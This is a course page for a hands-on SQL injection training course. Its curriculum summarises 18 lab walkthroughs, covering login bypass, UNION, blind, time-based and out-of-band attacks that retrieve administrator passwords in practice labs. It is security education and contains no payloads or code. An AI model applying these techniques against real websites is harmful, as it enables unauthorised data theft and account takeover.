Mastering SQL Injection - The Ultimate Hands-On Course
- Description
- Curriculum
- FAQ
- Reviews
For the longest time, up until a few years ago, SQL Injection fell under the number one most critical security risk facing web applications today. Although the vulnerability itself is simple to learn and exploit, it can potentially lead to disastrous consequences that leave an organization open to severe risks such as sensitive information disclosure, authentication bypass and even remote code execution.
In this course, we dive into the technical details behind SQL Injection vulnerabilities, the different types of SQL injection vulnerabilities, how to find them from both a black-box and a white-box perspective and cover the different ways to exploit SQL injection vulnerabilities. We also go through prevention and mitigation techniques on how to prevent and mitigate these types of vulnerabilities.
This is not your average course that just teaches you the basics of SQL Injection. This course contains over 9 hours worth of content that not only describes the technical details behind SQL Injection vulnerabilities, but also contains 18 labs that give you hands-on experience exploiting real-world examples. The labs are of varying difficulty levels starting with really simple examples and slowly moving up in difficulty.
If you’re a penetration tester, application security speciality, bug bounty hunter, software developer, ethical hacker, or just anyone interested in web application security, this course is for you!
-
11
Lab #1 SQL injection vulnerability in WHERE clause allowing retrieval of hiddenIn this video, we cover Lab #1 in the SQL injection track of the Web Security Academy. This lab contains an SQL injection vulnerability in the product category filter. To solve the lab, we perform a SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.
-
12
Lab #2 SQL injection vulnerability allowing login bypass
In this video, we cover lab #2 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the login function. To solve the lab, we perform a SQL injection attack that bypasses authentication and allows us to log into the application as the administrator user.
-
13
Lab #3 SQLi UNION attack determining the number of columns returned by the query
In this video, we cover Lab #3 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product filter category field. This vulnerability can be exploited using a UNION attack to retrieve data from other tables. To solve the lab, we perform a SQL injection attack that determines the number of columns that are being returned by the query. This is the first step of a SQL injection UNION attack. We'll use this technique in subsequent labs to construct the full attack.
-
14
Lab #4 SQL injection UNION attack, finding a column containing text
In this video, we cover Lab #4 in the SQL injection track of the Web Security Academy. This lab contains an SQL injection vulnerability in the product category filter. To solve the lab, we perform a SQL injection attack that returns an additional row containing the value provided. This technique helps us determine which columns are compatible with string data.
-
15
Lab #5 SQL injection UNION attack, retrieving data from other tables
In this video, we cover Lab #5 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category field. To solve the lab, we perform a UNION based SQL injection attack that retrieves the usernames and passwords of the users of the application.
-
16
Lab #6 SQL injection UNION attack, retrieving multiple values in a single column
In this video, we cover Lab #6 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category field. To solve the lab, we perform a UNION based SQL injection attack that retrieves the usernames and passwords of the users of the application in a single column.
-
17
Lab #7 SQL injection attack, querying the database type and version on Oracle
In this video, we cover Lab #7 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category field. To solve the lab, we perform a UNION based SQL injection attack that queries the database type and version on Oracle.
-
18
Lab #8 SQLi attack, querying the database type and version on MySQL & Microsoft
In this video, we cover Lab #8 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category field. To solve the lab, we perform a UNION based SQL injection attack that queries the database type and version on Microsoft and MySQL databases.
-
19
Lab #9 SQL injection attack, listing the database contents on non Oracle databas
In this video, we cover Lab #9 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category field. To solve the lab, we perform a UNION based SQL injection attack on a PostgreSQL database that retrieves the usernames and passwords of all users of the application.
-
20
Lab #10 SQL injection attack, listing the database contents on Oracle
In this video, we cover Lab #10 in the SQL injection track of the Web Security Academy. This lab contains a SQL injection vulnerability in the product category field. To solve the lab, we perform a UNION based SQL injection attack on a Oracle database that retrieves the usernames and passwords of all users of the application.
-
21
Lab #11 Blind SQL injection with conditional responses
In this video, we cover Lab #11 in the SQL injection track of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we perform a blind based SQL injection attack on the database that retrieves the password of the administrator user on the application.
-
22
Lab #12 Blind SQL injection with conditional errors
In this video, we cover Lab #12 in the SQL injection track of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we perform a blind based SQL injection attack on the database that retrieves the password of the administrator user on the application.
-
23
Lab #13 Blind SQL injection with time delays
In this video, we cover Lab #13 in the SQL injection track of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we exploit the time-based SQL injection vulnerability to cause a 10 second delay.
-
24
Lab #14 Blind SQL injection with time delays and information retrieval
In this video, we cover Lab #14 in the SQL injection track of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we exploit the time-based SQL injection vulnerability and output the password of the administrator user.
-
25
Note - Changes to Burp Collaborator -
26
Lab #15 Blind SQL injection with out-of-band interaction
In this video, we cover Lab #15 in the SQL injection module of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.
-
27
Lab #16 Blind SQL injection with out of band data exfiltration
In this video, we cover Lab #16 in the SQL injection module of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we exploit the out-of-band SQL injection vulnerability to output the administrator password.
-
28
Lab #17 SQL injection with filter bypass via XML encoding
In this video, we cover Lab #17 in the SQL injection module of the Web Security Academy. This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables.
The database contains a users table, which contains the usernames and passwords of registered users. To solve the lab, we perform a SQL injection attack to retrieve the admin user's credentials, then log in to their account.
-
29
Lab #18 Visible error-based SQL injection
In this video, we cover Lab #18 in the SQL injection module of the Web Security Academy. This lab contains a SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie. The results of the SQL query are not returned.
The database contains a different table called users, with columns called username and password. To solve the lab, find a way to leak the password for the administrator user, then log in to their account.
